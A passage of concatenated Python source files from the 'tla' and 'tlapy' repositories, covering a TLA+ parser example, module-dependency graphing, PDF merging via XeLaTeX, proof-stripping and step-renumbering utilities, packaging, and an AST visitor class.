# multiple axes ?
try:
surfaces = []
for curax in ax:
surface = surf(curax, q, z, resolution, **kwargs)
surfaces.append(surface)
return surfaces
except:
pass
# enough dimensions for surf ?
ndim = q.shape[0]
if ndim < 2:
raise Exception('space dim = q.shape[0] = 1.')
resolution = res2meshsize(resolution)
# Z ?
if z is None:
z = np.zeros(1, q.shape[1])
elif z is np.NaN:
z = 5 * np.random.rand(1, q.shape[1])
elif z == 'scaled':
z = np.array([])
else:
z = z * np.ones([1, q.shape[1] ])
# calc
if ndim < 3:
surface = surf2(q, z, resolution, ax, **kwargs)
else:
surface = surf_color(q, z, resolution, ax, **kwargs)
return surface
def surf2(q, z, res, ax, **kwargs):
X, Y = vec2meshgrid(q, res) # nargout=2
Z, = vec2meshgrid(z, res)
h = ax.plot_surface(X, Y, Z, **kwargs)
return h
def surf_color(q, c, res, ax, **kwargs):
X, Y, Z = vec2meshgrid(q, res) # nargout=3
# no color ?
if (0 in c.shape):
h = ax.plot_surface(X, Y, Z, **kwargs)
else:
C, = vec2meshgrid(c, res)
h = ax.plot_surface(X, Y, Z, cmap=C, **kwargs)
return h
``` |
{
"source": "johnyf/tla",
"score": 3
} |
#### File: tla/examples/parsing_tla_expressions.py
```python
from tla import parser
from tla.to_str import Nodes
expr = r'''
\/ /\ x = 1
/\ x' = 2
\/ /\ x = 2
/\ x' = 1
'''
def parse_expr():
"""Parse a TLA+ expression."""
tree = parser.parse_expr(expr)
print(tree)
def parse_expr_and_pretty_print():
"""Parse and print a TLA+ expression."""
tree = parser.parse_expr(expr, nodes=Nodes)
s = tree.to_str(width=80)
print(s)
if __name__ == '__main__':
parse_expr()
parse_expr_and_pretty_print()
``` |
{
"source": "johnyf/tlapy",
"score": 3
} |
#### File: tlapy/tlapy/tla_depends.py
```python
import argparse
import os
import re
import networkx as nx
def dump_dependency_graph(fname):
g = dependency_graph(fname)
pd = nx.drawing.nx_pydot.to_pydot(g)
pd.write_pdf('dependency_graph.pdf')
def dependency_graph(fname):
module, ext = os.path.splitext(fname)
assert ext == '.tla', ext
stack = [module]
g = nx.DiGraph()
while stack:
module = stack.pop()
modules = find_dependencies(module)
if modules is None:
continue
gen = ((module, v) for v in modules)
g.add_edges_from(gen)
stack.extend(modules)
return g
def find_dependencies(module):
fname = module + '.tla'
if not os.path.isfile(fname):
print('Cannot find file: {fname}'.format(fname=fname))
return
with open(fname, 'r') as f:
lines = f.readlines()
line, *_ = lines
m = re.match('-* MODULE ([a-zA-Z0-9]*) -*', line)
module_name, = m.groups()
extends_modules = list()
for line in lines:
if not line.startswith('EXTENDS'):
continue
line = line.lstrip()
s = line.split('EXTENDS', 1)[1]
modules = comma_to_list(s)
extends_modules.extend(modules)
return extends_modules
def comma_to_list(s):
r = s.split(',')
r = [t.strip() for t in r]
return r
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('fname', type=str,
help='Root TLA+ module file name')
args = parser.parse_args()
return args.fname
if __name__ == '__main__':
fname = parse_args()
dump_dependency_graph(fname)
```
#### File: tlapy/utils/join_modules.py
```python
import argparse
import os
import shutil
import subprocess
from PyPDF2 import PdfFileReader
START = r'''
\documentclass[letter]{article}
\usepackage{pdfpages}
\usepackage{hyperref}
\usepackage{verbatim}
\usepackage{tocloft}
\usepackage{tlamath}
\renewcommand\cftsecdotsep{\cftdotsep}
%\pagenumbering{gobble}
\begin{document}
'''
MIDDLE = r'''
\maketitle
'''
MIDDLE_2 = r'''
\tableofcontents
\newpage
\verbatiminput{./LICENSE}
\newpage
'''
END = r'''
\end{document}
'''
MERGED_FILE = 'merged_tla_modules.pdf'
AUXDIR = '__tlacache__/.aux'
LICENSE = 'LICENSE'
DEFAULT_TITLE = r'TLA\textsuperscript{+} modules'
def join_modules():
paths, author_name, title_str, date_str, abstract = parse_args()
lines = list()
for path in paths:
stem, fname = os.path.split(path)
assert not stem, stem # relative path
name, ext = os.path.splitext(fname)
assert ext == '.pdf', path
# front matter
title = name.replace('_', r'\_')
pdf = PdfFileReader(open(path, 'rb'))
page_count = pdf.getNumPages()
if page_count > 1:
include_rest = '\includepdf[pages=2-]{' + fname + '}'
else:
include_rest = ''
more_lines = [
'\includepdf[pages=1,pagecommand={\phantomsection ' +
'\\addcontentsline{toc}{section}{' + title +
'} }]{' + fname + '}',
include_rest]
lines.extend(more_lines)
# copy file to aux dir
target = os.path.join(AUXDIR, fname)
print(target)
shutil.copy(path, target)
if os.path.isfile(LICENSE):
target = os.path.join(AUXDIR, LICENSE)
shutil.copy(LICENSE, target)
if os.path.isfile(abstract):
target = os.path.join(AUXDIR, abstract)
shutil.copy(abstract, target)
if title_str is None:
title_str = DEFAULT_TITLE
title = r'\title{' + title_str + '}'
if author_name is None:
author = ''
else:
author = r'\author{' + author_name + '}\n'
if date_str is None:
date = ''
else:
date = r'\date{' + date_str + '}\n'
if abstract is None:
abstract = ''
else:
abstract = (r'\begin{abstract}\input{' + abstract +
r'} \end{abstract}')
latex = (
START + title + date + author + MIDDLE + abstract +
MIDDLE_2 + '\n'.join(lines) + END)
# typeset using XeLaTeX
name, ext = os.path.splitext(MERGED_FILE)
assert ext == '.pdf', MERGED_FILE
fname = name + '.tex'
path = os.path.join(AUXDIR, fname)
with open(path, 'w') as f:
f.write(latex)
cmd = ['xelatex', '--interaction=nonstopmode', fname]
subprocess.call(cmd, cwd=AUXDIR)
# copy merged PDF to current dir
path = os.path.join(AUXDIR, MERGED_FILE) # merged PDF
shutil.copy(path, MERGED_FILE)
def parse_args():
p = argparse.ArgumentParser()
p.add_argument('files', nargs='+',
help='file names')
p.add_argument('-a', '--author', type=str,
help='Document author')
p.add_argument('--title', type=str,
help='Document title')
p.add_argument('--date', type=str,
help='Document date')
p.add_argument('--abstract', type=str,
help='Document abstract')
args = p.parse_args()
return (
args.files, args.author, args.title,
args.date, args.abstract)
if __name__ == '__main__':
join_modules()
```
#### File: tlapy/utils/remove_proofs.py
```python
from __future__ import division
import argparse
import math
import logging
import os
import re
PROOF_SUFFIX = '_proofs'
HEADER_SUFFIX = '_header'
log = logging.getLogger(__name__)
def main():
"""Entry point."""
files, outdir = _parse_args()
for fname in files:
_remove_proofs(fname, outdir)
def _remove_proofs(fname, outdir):
"""Remove proofs from `fname` and dump result."""
base, ext = os.path.splitext(fname)
assert ext == '.tla', ext
assert base.endswith(PROOF_SUFFIX), base
with open(fname, 'r') as f:
lines = f.readlines()
new_lines = list()
inside_proof = False
last_indent = 0
for line in lines:
assert '\t' not in line, line
s = line.lstrip()
indent = len(line) - len(s)
is_dedent = indent <= last_indent
if is_dedent:
inside_proof = False
if re.match('<\d+>', s) is None:
if inside_proof:
continue
new_lines.append(line)
continue
inside_proof = True # omit lines
# rename module by removing "_proofs"
line = new_lines[0]
assert 'MODULE' in line, line
assert base in line, line
new_module = base.replace(PROOF_SUFFIX, HEADER_SUFFIX)
old_len = len(base) - len(PROOF_SUFFIX) + len(HEADER_SUFFIX)
assert len(new_module) == old_len, (new_module, base)
new_ln = line.replace(base, new_module)
# add dashes
missing_dashes = len(base) - len(new_module)
half = missing_dashes / 2
n = int(math.floor(half))
m = int(math.ceil(half))
assert n + m == missing_dashes, (n, m, missing_dashes)
new_ln = n * '-' + new_ln[:-1] + m * '-' + '\n'
assert len(new_ln) == len(line), (new_ln, line)
new_lines[0] = new_ln
# add notice that header has been auto-generated
text = (
'(* This file was automatically generated '
'from the file:\n')
line = (text + ' "{f}"\n*)\n').format(f=fname)
new_lines.insert(0, line)
# avoid overwriting source files
header_fname = new_module + '.tla'
header_path = os.path.join(outdir, header_fname)
if os.path.isfile(header_path):
with open(header_path, 'r') as f:
line = f.readline()
assert line.startswith(text), (line, text)
# dump header
print('Dump header to file "{h}"'.format(h=header_path))
content = ''.join(new_lines)
with open(header_path, 'w') as f:
f.write(content)
def _parse_args():
"""Return input file names and output directory."""
p = argparse.ArgumentParser()
p.add_argument('input', nargs='+', type=str,
help="input `*.tla` files")
p.add_argument('-o', '--outdir', type=str, default='.',
help='output directory')
args = p.parse_args()
files = args.input
outdir = args.outdir
log.info('input files: {fs}'.format(fs=files))
log.info('output directory: {d}'.format(d=outdir))
return files, outdir
if __name__ == '__main__':
main()
```
#### File: tlapy/utils/renumber_proof_steps.py
```python
import collections
import re
# TODO: renumber proof levels 2..5
# This renumbering could be obtained by counting from 1 and restarting the
# count whenever a new level 1 step name is encountered.
def main(fname, start_line, end_line):
with open(fname, 'r') as f:
lines = f.readlines()
lines = lines[start_line : end_line]
spec = ''.join(lines)
# print(spec)
level = 1
pattern = '<{level}>\d+\.'.format(level=level)
step_names = re.findall(pattern, spec)
mapping = rename_steps(step_names, suffix='temp', level=level)
s = replace_step_names(mapping, spec)
# print(s)
temp_names = [
v for v in mapping.values()
if v.endswith('.')]
new_names = rename_steps(temp_names)
s = replace_step_names(new_names, s)
with open('input.tla', 'w') as f:
f.write(spec)
return s
def rename_steps(step_names, suffix='', level=1):
renaming = collections.OrderedDict()
for i, name in enumerate(step_names, 1):
new_name = '<{level}>{i}{temp}'.format(
level=level, i=i, temp=suffix)
# renaming the definition of the step name
renaming[name] = new_name + '.'
# renaming references to the step name
old_ref = name[:-1] + ' '
new_ref = new_name + ' '
renaming[old_ref] = new_ref
return renaming
def replace_step_names(step_names, s):
for old, new in step_names.items():
s = s.replace(old, new)
return s
if __name__ == '__main__':
fname = 'demo.tla'
start_line = 1300
end_line = 3500
spec = main(fname, start_line, end_line)
with open('renumbered.tla', 'w') as f:
f.write(spec)
``` |
{
"source": "johnyf/tla",
"score": 2
} |
#### File: johnyf/tla/setup.py
```python
from setuptools import setup
name = 'tla'
description = (
'Parser and abstract syntax tree for TLA+, '
'the temporal logic of actions.')
README = 'README.md'
long_description = open(README).read()
url = 'https://github.com/johnyf/{name}'.format(name=name)
VERSION_FILE = '{name}/_version.py'.format(name=name)
MAJOR = 0
MINOR = 0
MICRO = 2
version = '{major}.{minor}.{micro}'.format(
major=MAJOR, minor=MINOR, micro=MICRO)
s = (
'# This file was generated from `setup.py`\n'
"version = '{version}'\n").format(version=version)
install_requires = [
'infix >= 1.2',
'ply >= 3.4, <= 3.10',
]
tests_require = ['nose']
classifiers = [
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: Scientific/Engineering',
'Topic :: Software Development :: Compilers',
]
keywords = [
'TLA+', 'TLA', 'temporal logic of actions',
'formal', 'specification',
'expression', 'formula', 'module',
'mathematics', 'theorem', 'proof',
'parser', 'lexer', 'parsing',
'ast', 'abstract syntax tree', 'syntax tree',
'ply', 'lex',
]
def run_setup():
"""Write version file and install package."""
with open(VERSION_FILE, 'w') as f:
f.write(s)
setup(
name=name,
version=version,
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url=url,
license='BSD',
install_requires=install_requires,
tests_require=tests_require,
packages=[name],
package_dir={name: name},
classifiers=classifiers,
keywords=keywords)
if __name__ == '__main__':
run_setup()
```
#### File: tla/tla/_intf.py
```python
class Token(object):
"""Type of tokens."""
pass
# val bof : Loc.locus -> token (* beginning of file *)
# (** token representing start of file *)
def bof(locus):
"""Token representing beginning of file."""
return token
# val rep : token -> string
# (** String representation of tokens *)
def rep(token):
"""String representation of token."""
return string
# val locus : token -> Loc.locus
# (** Origin of the token *)
def locus(token):
"""Location of the token in text."""
return locus
# val eq : token -> token -> bool
# (** Are the tokens equivalent? *)
def eq(token, other_token):
"""Whether tokens are equivalent."""
return boolean
# val pp_print_token : Format.formatter -> token -> unit
# (** For use in format strings *)
def pp_print_token(formatter, token):
"""For use in format strings."""
pass
# end
# (** Precedence *)
# module type Prec = sig
# type prec
# (** Abstract type of precedence *)
class Prec(object):
"""Abstract type of operator precedence."""
pass
# val below : prec -> prec -> bool
# (** {!below} [p q] means that [p] is entirely below [q] *)
def below(prec, other_prec):
"""Whether `prec` is entirely below `other_prec`."""
return boolean
# val conflict : prec -> prec -> bool
# (** {!conflict} [p q] means that an unbracketed expression with
# two operators of precedence [p] and [q] respectively would be
# ambiguous. *)
def conflict(prec, other_prec):
"""Whether `prec` and `other_prec` have overlapping precedence ranges."""
return boolean
# end
```
#### File: tla/tla/iter.py
```python
import math
import textwrap
from tla.to_str import Nodes as _Nodes
LINE_WIDTH = 80
INDENT_WIDTH = 4
def _visit_bounds(
bounds, *arg, visitor=None, **kw):
"""Call the `visit` method of each bound."""
for name, kind, dom in bounds:
dom.visit(
*arg, visitor=visitor, **kw)
def _visit_usable(
usable, *arg, visitor=None, **kw):
for fact in usable['facts']:
fact.visit(
*arg, visitor=visitor, **kw)
for defn in usable['defs']:
defn.visit(
*arg, visitor=visitor, **kw)
class Nodes(_Nodes):
"""Translating TLA+ AST nodes to strings."""
# Builtin operators
class FALSE(_Nodes.FALSE):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class TRUE(_Nodes.TRUE):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class BOOLEAN(_Nodes.BOOLEAN):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class STRING(_Nodes.STRING):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Implies(_Nodes.Implies):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Equiv(_Nodes.Equiv):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Conj(_Nodes.Conj):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Disj(_Nodes.Disj):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Neg(_Nodes.Neg):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Eq(_Nodes.Eq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Neq(_Nodes.Neq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SUBSET(_Nodes.SUBSET):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class UNION(_Nodes.UNION):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class DOMAIN(_Nodes.DOMAIN):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Subseteq(_Nodes.Subseteq):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Mem(_Nodes.Mem):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Notmem(_Nodes.Notmem):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Setminus(_Nodes.Setminus):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cap(_Nodes.Cap):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cup(_Nodes.Cup):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Prime(_Nodes.Prime):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class LeadsTo(_Nodes.LeadsTo):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ENABLED(_Nodes.ENABLED):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class UNCHANGED(_Nodes.UNCHANGED):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Cdot(_Nodes.Cdot):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class WhilePlus(_Nodes.WhilePlus):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Box(_Nodes.Box):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Diamond(_Nodes.Diamond):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Opaque(_Nodes.Opaque):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Internal(_Nodes.Internal):
def visit(self, *arg, visitor=None, **kw):
self.value.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Apply(_Nodes.Apply):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for arg_ in self.operands:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Function(_Nodes.Function):
def visit(self, *arg, visitor=None, **kw):
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class FunctionApply(_Nodes.FunctionApply):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for arg_ in self.args:
arg_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class ShapeExpr(_Nodes.ShapeExpr):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ShapeOp(_Nodes.ShapeOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Lambda(_Nodes.Lambda):
def visit(self, *arg, visitor=None, **kw):
for name, shape in self.name_shapes:
shape.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class TemporalSub(_Nodes.TemporalSub):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.action.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Sub(_Nodes.Sub):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.action.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class BoxOp(_Nodes.BoxOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class DiamondOp(_Nodes.DiamondOp):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Dot(_Nodes.Dot):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Parens(_Nodes.Parens):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.pform.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Syntax(_Nodes.Syntax):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class NamedLabel(_Nodes.NamedLabel):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class IndexedLabel(_Nodes.IndexedLabel):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class If(_Nodes.If):
def visit(self, *arg, visitor=None, **kw):
self.test.visit(
*arg, visitor=visitor, **kw)
self.then.visit(
*arg, visitor=visitor, **kw)
self.else_.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Let(_Nodes.Let):
def visit(self, *arg, visitor=None, **kw):
for defn in self.definitions:
defn.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Forall(_Nodes.Forall):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Exists(_Nodes.Exists):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class RigidQuantifier(_Nodes.RigidQuantifier):
def visit(self, *arg, visitor=None, **kw):
self.quantifier.visit(
*arg, visitor=visitor, **kw)
_visit_bounds(
self.bounds,
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class TemporalQuantifier(_Nodes.TemporalQuantifier):
def visit(self, *arg, visitor=None, **kw):
self.quantifier.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Choose(_Nodes.Choose):
def visit(self, *arg, visitor=None, **kw):
if self.bound is not None:
self.bound.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Case(_Nodes.Case):
def visit(self, *arg, visitor=None, **kw):
for guard, expr in self.arms:
guard.visit(
*arg, visitor=visitor, **kw)
expr.visit(
*arg, visitor=visitor, **kw)
self.other.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetEnum(_Nodes.SetEnum):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetSt(_Nodes.SetSt):
def visit(self, *arg, visitor=None, **kw):
self.bound.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SetOf(_Nodes.SetOf):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
_visit_bounds(
self.boundeds,
*arg, visitor=visitor, **kw)
visitor(self)
# type of junction list
class And(_Nodes.And):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Or(_Nodes.Or):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class List(_Nodes.List):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Record(_Nodes.Record):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.items:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class RecordSet(_Nodes.RecordSet):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.items:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Except_dot(_Nodes.Except_dot):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Except_apply(_Nodes.Except_apply):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Except(_Nodes.Except):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for expoints, expr in self.exspec_list:
expr.visit(
*arg, visitor=visitor, **kw)
for expoint in expoints:
expoint.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Domain(_Nodes.Domain):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class NoDomain(_Nodes.NoDomain):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Ditto(_Nodes.Ditto):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Bounded(_Nodes.Bounded):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Unbounded(_Nodes.Unbounded):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Visible(_Nodes.Visible):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Hidden(_Nodes.Hidden):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class NotSet(_Nodes.NotSet):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class At(_Nodes.At):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Arrow(_Nodes.Arrow):
def visit(self, *arg, visitor=None, **kw):
self.expr1.visit(
*arg, visitor=visitor, **kw)
self.expr2.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Tuple(_Nodes.Tuple):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Bang(_Nodes.Bang):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
for sel in self.sel_list:
sel.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class WeakFairness(_Nodes.WeakFairness):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class StrongFairness(_Nodes.StrongFairness):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class String(_Nodes.String):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Number(_Nodes.Number):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Fairness(_Nodes.Fairness):
def visit(self, *arg, visitor=None, **kw):
self.op.visit(
*arg, visitor=visitor, **kw)
self.subscript.visit(
*arg, visitor=visitor, **kw)
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SelLab(_Nodes.SelLab):
def visit(self, *arg, visitor=None, **kw):
for expr in self.exprs:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class SelInst(_Nodes.SelInst):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelNum(_Nodes.SelNum):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelLeft(_Nodes.SelLeft):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelRight(_Nodes.SelRight):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelDown(_Nodes.SelDown):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class SelAt(_Nodes.SelAt):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Sequent(_Nodes.Sequent):
def visit(self, *arg, visitor=None, **kw):
for item in self.context:
item.visit(
*arg, visitor=visitor, **kw)
self.goal.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Fact(_Nodes.Fact):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
self.time.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# operator declarations
class Flex(_Nodes.Flex):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Fresh(_Nodes.Fresh):
def visit(self, *arg, visitor=None, **kw):
self.shape.visit(
*arg, visitor=visitor, **kw)
self.kind.visit(
*arg, visitor=visitor, **kw)
self.domain.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Constant(_Nodes.Constant):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class State(_Nodes.State):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Action(_Nodes.Action):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Temporal(_Nodes.Temporal):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class OperatorDef(_Nodes.OperatorDef):
def visit(self, *arg, visitor=None, **kw):
self.expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Instance(_Nodes.Instance):
def visit(self, *arg, visitor=None, **kw):
for name, expr in self.sub:
expr.visit(
*arg, visitor=visitor, **kw)
visitor(self)
# Syntax nodes of module elements
class Constants(_Nodes.Constants):
def visit(self, *arg, visitor=None, **kw):
for name, shape in self.declarations:
shape.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Variables(_Nodes.Variables):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Recursives(_Nodes.Recursives):
def visit(self, *arg, visitor=None, **kw):
raise NotImplementedError('RECURSIVE')
class Local(_Nodes.Local):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Export(_Nodes.Export):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class User(_Nodes.User):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Definition(_Nodes.Definition):
def visit(self, *arg, visitor=None, **kw):
self.definition.visit(
*arg, visitor=visitor, **kw)
self.wheredef.visit(
*arg, visitor=visitor, **kw)
self.visibility.visit(
*arg, visitor=visitor, **kw)
self.local.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class AnonymousInstance(_Nodes.AnonymousInstance):
def visit(self, *arg, visitor=None, **kw):
self.instance.visit(
*arg, visitor=visitor, **kw)
self.local.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Mutate(_Nodes.Mutate):
def visit(self, *arg, visitor=None, **kw):
self.kind.visit(
*arg, visitor=visitor, **kw)
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class ModuleHide(_Nodes.Hide):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class ModuleUse(_Nodes.Use):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Module(_Nodes.Module):
def visit(self, *arg, visitor=None, **kw):
for unit in self.body:
unit.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Submodule(_Nodes.Submodule):
def visit(self, *arg, visitor=None, **kw):
self.module.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Suppress(_Nodes.Suppress):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Emit(_Nodes.Emit):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class StepStar(_Nodes.StepStar):
pass
class StepPlus(_Nodes.StepPlus):
pass
class StepNum(_Nodes.StepNum):
pass
class Only(_Nodes.Only):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Default(_Nodes.Default):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class PreBy(_Nodes.PreBy):
pass
class PreObvious(_Nodes.PreObvious):
pass
class PreOmitted(_Nodes.PreOmitted):
pass
class Explicit(_Nodes.Explicit):
pass
class Implicit(_Nodes.Implicit):
pass
class PreStep(_Nodes.PreStep):
pass
class PreHide(_Nodes.PreHide):
pass
class PreUse(_Nodes.PreUse):
pass
class PreDefine(_Nodes.PreDefine):
pass
class PreAssert(_Nodes.PreAssert):
pass
class PreSuffices(_Nodes.PreSuffices):
pass
class PreCase(_Nodes.PreCase):
pass
class PrePick(_Nodes.PrePick):
pass
class PreHave(_Nodes.PreHave):
pass
class PreTake(_Nodes.PreTake):
pass
class PreWitness(_Nodes.PreWitness):
pass
class PreQed(_Nodes.PreQed):
pass
class Theorem(_Nodes.Theorem):
def visit(self, *arg, visitor=None, **kw):
self.body.visit(
*arg, visitor=visitor, **kw)
self.proof.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class Named(_Nodes.Named):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Unnamed(_Nodes.Unnamed):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
# Proofs
class Obvious(_Nodes.Obvious):
def visit(self, *arg, visitor=None, **kw):
visitor(self)
class Omitted(_Nodes.Omitted):
def visit(self, *arg, visitor=None, **kw):
self.omission.visit(
*arg, visitor=visitor, **kw)
visitor(self)
class By(_Nodes.By):
def visit(self, *arg, visitor=None, **kw):
_visit_usable(
self.usable,
*arg, visitor=visitor, **kw)
visitor(self)
class Steps(_Nodes.Steps):
def visit(self, *arg, visitor=None, **kw):
for step in self.steps:
step.visit(
